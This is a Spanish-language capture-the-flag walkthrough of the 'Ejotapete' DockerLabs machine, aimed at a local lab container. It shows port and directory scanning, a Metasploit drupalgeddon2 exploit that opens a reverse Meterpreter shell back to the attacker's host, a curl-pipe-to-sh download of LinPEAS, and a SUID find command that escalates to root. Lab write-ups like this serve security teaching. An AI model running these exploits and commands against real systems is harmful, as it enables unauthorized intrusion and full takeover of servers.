Ejotapete DockerLabs (Very Easy)
Instalación
Cuando obtenemos el .zip nos lo pasamos al entorno en el que vamos a empezar a hackear la maquina y haremos lo siguiente.
unzip ejotapete.zipNos lo descomprimira y despues montamos la maquina de la siguiente forma.
bash auto_deploy.sh ejotapete.tarInfo:
## .
## ## ## ==
## ## ## ## ===
/""""""""""""""""\___/ ===
~~~ {~~ ~~~~ ~~~ ~~~~ ~~ ~ / ===- ~~~
\______ o __/
\ \ __/
\____\______/
___ ____ ____ _ _ ____ ____ _ ____ ___ ____
| \ | | | |_/ |___ |__/ | |__| |__] [__
|__/ |__| |___ | \_ |___ | \ |___ | | |__] ___]
Estamos desplegando la máquina vulnerable, espere un momento.
Máquina desplegada, su dirección IP es --> 172.17.0.2
Presiona Ctrl+C cuando termines con la máquina para eliminarlaPor lo que cuando terminemos de hackearla, le damos a Ctrl+C y nos eliminara la maquina para que no se queden archivos basura.
Escaneo de puertos
nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn <IP>nmap -sCV -p<PORTS> <IP>Info:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-14 11:39 EDT
Nmap scan report for packer.pw (172.17.0.2)
Host is up (0.000058s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.25
|_http-title: 403 Forbidden
|_http-server-header: Apache/2.4.25 (Debian)
MAC Address: 02:42:AC:11:00:02 (Unknown)
Service Info: Host: 172.17.0.2
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.68 secondsVeremos un puerto 80 en el que aloja una pagina web, si entramos dentro veremos un 403 Forbidden por lo que vamos a realizar un poco de fuzzing a ver que encontramos.
Gobuster
gobuster dir -u http://<IP>/ -w <WORDLIST> -x html,php,txt -t 50 -k -rInfo:
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://172.17.0.2/
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: html,php,txt
[+] Follow Redirect: true
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html (Status: 403) [Size: 290]
/drupal (Status: 200) [Size: 8892]
/.html (Status: 403) [Size: 290]
/server-status (Status: 403) [Size: 298]
Progress: 882240 / 882244 (100.00%)
===============================================================
Finished
===============================================================Veremos que hay un /drupal por lo que vamos a entrar a ver si es el CMS real.
Si entramos veremos que efectivamente hay un drupal, este tipo de CMS tienen bastantes vulnerabilidades conocidas, por lo que vamos a ir a metasploit para desde ahi intentar explotar alguna vulnerabilidad si la tuviera, ya que no nos menciona la version vamos a probar a ciegas con algunos exploits conocidos.
Escalate user www-data
Metasploit (drupalgeddon2)
msfconsole -qUna vez dentro vamos a buscar drupal.
search drupalElegiremos el numero 1 que es el modulo unix/webapp/drupal_drupalgeddon2 ya que es con el que me ha funcionado.
use unix/webapp/drupal_drupalgeddon2Una vez que lo hayamos seleccionado, vamos a configurarlo de esta forma:
set RHOSTS <IP_VICTIM>
set TARGETURI /drupal
set LPORT 9999
exploitSeleccionamos el TARGETURI ya que el drupal no va en la raiz del puerto 80 por lo que tendremos que poner desde donde se esta suministrando.
Info:
[*] Started reverse TCP handler on 192.168.177.129:9999
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[*] Sending stage (40004 bytes) to 172.17.0.2
[*] Meterpreter session 1 opened (192.168.177.129:9999 -> 172.17.0.2:48976) at 2025-07-14 11:58:51 -0400
meterpreter > getuid
Server username: www-dataVeremos que ha funcionado y seremos dicho usuario.
Escalate Privileges
Si lanzamos un LinPEAS podremos ver lo siguiente:
curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | shInfo:

Vemos que tenemos find con permisos SUID por lo que podremos hacer lo siguiente:
find . -exec /bin/bash -p \; -quitInfo:
bash-4.4# whoami
whoami
rootCon esto ya seremos root, por lo que habremos terminado la maquina.
Last updated